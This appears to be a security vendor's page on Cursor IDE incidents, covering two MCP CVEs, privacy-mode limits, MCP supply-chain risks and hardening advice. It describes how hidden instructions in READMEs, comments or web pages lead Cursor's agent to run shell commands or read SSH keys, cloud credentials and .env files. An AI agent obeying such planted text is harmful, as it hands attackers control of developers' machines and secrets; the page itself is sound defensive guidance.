Cursor Security Incidents
A timeline of security incidents, CVEs, and vulnerability patterns affecting Cursor IDE users, including MCP server exploits, privacy mode limitations, and AI-generated code risks.
Known CVEs
CVE-2025-54135 — MCP Server Command Injection
A command injection vulnerability in Cursor's MCP server implementation allowed attackers to execute arbitrary shell commands on the developer's machine. Through prompt injection attacks — hidden instructions in web pages, repositories, or documentation — an attacker could trick Cursor's AI agent into executing malicious terminal commands via the MCP tool interface.
Attack Vector
An attacker places hidden instructions in a repository README, code comment, or web page. When a Cursor user asks the AI to analyze or work with this content, the prompt injection triggers the AI to call MCP tools with malicious parameters, executing arbitrary commands.
CVE-2025-54136 — MCP Server Path Traversal
A path traversal vulnerability in Cursor's MCP implementation allowed reading and writing files outside the intended project directory. Through the same prompt injection vector, an attacker could instruct the AI to read sensitive files like SSH keys, environment variables, and cloud credentials from anywhere on the file system.
Potential Data Exfiltration
- • SSH private keys (~/.ssh/id_rsa)
- • Cloud provider credentials (~/.aws/credentials)
- • Environment files with database passwords (.env)
- • Browser cookies and stored passwords
Additional Security Concerns
Privacy Mode Limitations
Cursor offers a privacy mode that prevents code from being stored on Cursor's servers or used for model training. However, code is still transmitted to AI providers (OpenAI, Anthropic) for real-time processing. Privacy mode controls data retention, not data transmission. For organizations with strict data sovereignty requirements, this distinction is critical.
What Privacy Mode Does
- • Prevents code storage on Cursor servers
- • Opts out of training data collection
- • Disables telemetry on code content
What It Does Not Do
- • Does not prevent real-time code transmission to AI providers
- • Does not protect against MCP vulnerabilities
- • Does not validate security of AI-generated code
MCP Server Supply Chain Risks
Cursor's MCP server ecosystem allows third-party tool integrations that extend AI capabilities. These servers run with the user's system permissions and can access files, network resources, and execute commands. Malicious or compromised MCP servers represent a significant supply chain attack vector.
Risk Factors
- • No centralized MCP server registry with security auditing
- • MCP servers run with the same permissions as the user
- • No sandboxing between MCP servers and the host system
- • Updates to MCP servers can introduce malicious code
AI-Generated Code Vulnerabilities
Like all AI coding assistants, Cursor generates code that may contain security vulnerabilities. Common patterns include missing input validation, insecure authentication implementations, SQL injection through string concatenation, and hardcoded secrets. The risk is amplified by Cursor's agent mode which can generate and execute multi-file changes with minimal review.
Securing Your Cursor Workflow
Keep Cursor Updated
Security patches for MCP vulnerabilities are delivered through Cursor updates. Always run the latest version.
Audit MCP Servers
Only install MCP servers from trusted sources. Review their code and permissions before enabling them. Remove unused MCP servers.
Review AI-Generated Code
Never accept multi-file agent changes without reviewing each file. Pay special attention to authentication, database queries, and API key handling.
Use Approval Mode for Terminal Commands
Configure Cursor to require explicit approval before executing terminal commands. Never allow auto-execution of shell commands.
Isolate Development Environments
Run Cursor in containers or VMs without access to production credentials, SSH keys, or cloud provider configurations.
Scan Before Deploying
Use security scanning tools to audit code generated by Cursor before pushing to production.
Secure Your Cursor-Built Applications
AI-generated code from Cursor needs security validation before deployment. Scan your application for vulnerabilities, exposed secrets, and authentication gaps.
Scan Your AppFrequently Asked Questions
What CVEs affect Cursor IDE?
Cursor has been affected by CVE-2025-54135 (MCP server command injection) and CVE-2025-54136 (MCP server path traversal). These vulnerabilities allow attackers to execute arbitrary commands and access files outside the project directory through prompt injection attacks.
Does Cursor privacy mode fully protect my code?
Cursor's privacy mode prevents code from being stored or used for training, but code is still sent to AI providers for processing. Privacy mode controls data retention, not real-time processing. It does not prevent MCP vulnerabilities or protect against AI-generated code issues.
Are Cursor MCP servers safe to use?
MCP servers expand AI capabilities but introduce supply chain risks. Only install MCP servers from trusted sources, review their permissions, and keep them updated. The MCP protocol has no built-in authentication, making tool calls susceptible to prompt injection.
Last updated: February 2026